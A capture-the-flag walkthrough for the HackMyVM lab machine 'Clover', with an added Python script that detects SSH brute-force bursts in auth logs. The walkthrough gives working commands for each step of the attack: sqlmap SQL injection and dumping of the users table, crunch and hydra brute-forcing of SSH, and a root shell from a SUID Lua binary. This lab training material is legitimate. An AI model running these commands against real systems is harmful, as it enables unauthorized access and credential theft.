https://hackmyvm.eu/machines/machine.php?vm=Clover
Scan ports.
nmap -sV -sC -p- 192.168.56.99 -oN ports.log
Log in to FTP anonymously; it holds 5 text files, but nothing useful.
Scan port 80.
gobuster dir -u http://192.168.56.99 -t 80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
Default credentials do not log in to phpMyAdmin. Check /website.
Check the source code of /website/index.html; it contains a hint about "ColdFusion".
Scan port 80 with the ColdFusion wordlist from SecLists.
gobuster dir -u http://192.168.56.99/ -t 50 -w /usr/share/seclists/Discovery/Web-Content/coldfusion.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o coldfusion.log
Open login.php and try some common credentials; they fail. Since we have no other hints about credentials, check whether the login form has SQL injection.
Capture the login request with Burp Suite, save it to post.txt, then use sqlmap to check for the vulnerability.
sqlmap -r post.txt -p uname,pswd --dbs --batch
Then we can dump the password hash of asta.
sqlmap -r post.txt -p uname,pswd --batch -D clover -T users --dump
Crack the hash online to get asta's password, then log in over SSH as asta.
After a lot of enumeration, we locate a password hint about another user, "sword".
Generate a password list with crunch and brute-force sword's password.
crunch 12 12 -t P4SsW0rD%%%% >dic.txt
hydra -l sword -P dic.txt 192.168.56.99 ssh -t 64 -f
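As an added defender-side example (not part of this write-up): a hydra run like the one above leaves a dense burst of failed sshd logins for one user from one source. This script parses constructed auth.log-style lines (host name, IPs and timestamps are made up) and flags such bursts, noting whether a successful login followed.

```python
# Added defender-side example (not from the write-up): flag the burst of failed SSH
# passwords one hydra run leaves in sshd logs. Sample lines below are constructed.
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Jan 10 12:00:01 clover sshd[1201]: Failed password for sword from 192.168.56.1 port 40001 ssh2
Jan 10 12:00:01 clover sshd[1202]: Failed password for sword from 192.168.56.1 port 40002 ssh2
Jan 10 12:00:02 clover sshd[1203]: Failed password for sword from 192.168.56.1 port 40003 ssh2
Jan 10 12:00:02 clover sshd[1204]: Failed password for sword from 192.168.56.1 port 40004 ssh2
Jan 10 12:00:03 clover sshd[1205]: Failed password for sword from 192.168.56.1 port 40005 ssh2
Jan 10 12:00:04 clover sshd[1207]: Accepted password for sword from 192.168.56.1 port 40007 ssh2
Jan 10 12:30:00 clover sshd[1300]: Failed password for asta from 192.168.56.50 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

def parse(line, year=2024):
    # Returns (timestamp, result, user, ip), or None for lines we do not track.
    if not (m := LINE_RE.match(line)):
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Map (ip, user) -> (total failures, success_after) for pairs with at least
    `threshold` failed passwords inside `window_s` seconds; success_after = likely compromise."""
    failures = defaultdict(list)   # (ip, user) -> failure timestamps, in log order
    successes = set()
    for line in log_text.splitlines():
        if (parsed := parse(line)) is None:
            continue
        ts, result, user, ip = parsed
        key = (ip, user)
        if result == "Failed":
            failures[key].append(ts)
        elif key in failures:      # a success that follows earlier failures
            successes.add(key)
    alerts = {}
    for key, stamps in failures.items():
        stamps.sort()
        for i in range(len(stamps) - threshold + 1):
            if (stamps[i + threshold - 1] - stamps[i]).total_seconds() <= window_s:
                alerts[key] = (len(stamps), key in successes)
                break
    return alerts
```

On the sample above the only alert is for sword from 192.168.56.1 (5 failures in 2 seconds, followed by a success); asta's single failure is below the threshold.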
After logging in as sword, check SUID files.
Run deamon.sh; it is actually a Lua program.
Since it runs with a root euid, we can get a root shell through Lua.
./deamon.sh -e 'os.execute("/bin/sh")'
Now we can read the root flag.